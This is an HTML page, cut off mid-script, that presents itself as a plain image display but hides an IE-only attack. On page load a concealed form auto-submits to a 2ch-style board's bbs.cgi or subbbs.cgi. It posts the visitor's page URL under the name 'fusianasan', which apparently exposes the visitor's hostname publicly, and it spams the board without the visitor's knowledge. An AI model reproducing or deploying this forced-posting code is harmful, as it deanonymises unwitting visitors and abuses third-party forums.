<!DOCTYPE>
<HTML>
<HEAD>
</HEAD>
<BODY>
<![if ! IE]>
<IMG src="
http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg">
<![endif]>
<!--[if lt IE 5.5000]>
<noscript>
<IMG src="
http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg">
</noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="
http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg" id=img1 style=display:none>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>
function main1(tar){
var t1=tar.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
}
if(key){
f1.action='
http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='
http://'+dom+'/test/subbbs.cgi';
f1.subject.value=parent.location.href;
}
f1.FROM.value='fusianasan';
f1.mail.value='sage';
f1.MESSAGE.value=parent.location.href;
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
var t2="if1.location.replace('about:blank')";
parent.setTimeout(t2,5000);
f1.submit.click();
}
function main2(){
var t3=String(Math.floor(new Date().getTime()/1000));
setCookie('history',t3);
}